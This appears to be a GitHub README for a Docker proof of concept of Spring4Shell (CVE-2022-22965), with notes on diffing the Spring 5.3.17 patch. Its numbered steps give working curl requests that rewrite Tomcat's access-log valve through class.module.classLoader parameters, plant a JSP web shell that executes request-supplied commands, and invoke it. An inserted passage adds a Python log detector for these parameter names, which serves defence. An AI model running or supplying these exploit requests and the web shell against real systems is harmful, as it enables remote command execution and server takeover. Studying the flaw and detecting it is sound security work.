itsecurityco / CVE-2022-22965

Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5

Spring Boot CVE-2022-22965

🚀 Getting Started

  1. Download the distribution code from https://github.com/itsecurityco/CVE-2022-22965/archive/refs/heads/master.zip and unzip it.
  2. Run docker compose up --build to build and start the vulnerable application.
  3. Run curl -H "Accept: text/html;" "http://localhost:8080/demo/itsecurityco?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" to change the Tomcat valve configuration.
  4. Run curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x" to create the web shell.
  5. Open your browser and go to http://localhost:8080/shell.jsp?1337=id to start executing commands.
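Steps 3 and 4 reach Tomcat through Spring's data binder as class.module.classLoader.* property paths, which is also what a defender can key on. The following detector is an added example, not part of this repository: it scans constructed Tomcat access-log lines for such property names after URL decoding and records whether they touch the pipeline.first valve settings the PoC relies on. The Common Log Format regex, the sample lines and the prefix list are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Decoded, lower-cased parameter-name prefixes that walk from a bound bean's
# `class` property into the ClassLoader / ProtectionDomain graph. Ordinary
# form binding never needs these, so a single hit is worth an alert.
SUSPICIOUS_PREFIXES = (
    "class.module.classloader",
    "class.classloader",
    "class.protectiondomain",
)
# Sub-path this PoC uses to reach the Tomcat AccessLogValve settings.
PIPELINE_VALVE = ".pipeline.first."

# Constructed Tomcat access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
172.18.0.1 - - [31/Mar/2022:10:00:01 +0000] "GET /demo/itsecurityco?name=alice HTTP/1.1" 200 12
172.18.0.1 - - [31/Mar/2022:10:00:02 +0000] "GET /demo/itsecurityco?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 12
172.18.0.1 - - [31/Mar/2022:10:00:03 +0000] "GET /demo/x?class%2Emodule%2EclassLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT HTTP/1.1" 200 12
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def suspicious_params(target):
    """Parameter names in a request target that start with SUSPICIOUS_PREFIXES.
    parse_qsl percent-decodes names first, so an encoded `class%2Emodule...`
    is caught like the plain spelling."""
    query = urlsplit(target).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if name.lower().startswith(SUSPICIOUS_PREFIXES)]

def scan_log(text):
    """(ip, timestamp, path, hit_names, touches_valve) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        hits = suspicious_params(m["target"])
        if hits:
            touches_valve = any(PIPELINE_VALVE in h.lower() for h in hits)
            findings.append((m["ip"], m["ts"], urlsplit(m["target"]).path,
                             hits, touches_valve))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only the query string is visible in an access log; the same parameter names arriving in a POST body have to be inspected at the application or WAF layer.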

🔎 Patch revision

The source code for Spring Framework 5.3.17 (vulnerable) and Spring Framework 5.3.18 (patched) can be downloaded respectively from:

$ wget https://github.com/spring-projects/spring-framework/archive/refs/tags/v5.3.17.zip
$ wget https://github.com/spring-projects/spring-framework/archive/refs/tags/v5.3.18.zip

The vulnerability is in the /spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java file at line 290: the property-descriptor filter checks for the Class.getClassLoader() and Class.getProtectionDomain() methods, but not for properties of type ClassLoader or ProtectionDomain, nor for the PropertyDescriptor names.

The difference between the vulnerable code and the patched code can be obtained with the diff command:

$ diff spring-framework-5.3.17/spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java spring-framework-5.3.18/spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java

Patch


Credits

  • Original research: @p1n93r
  • Thanks: @fmunoz
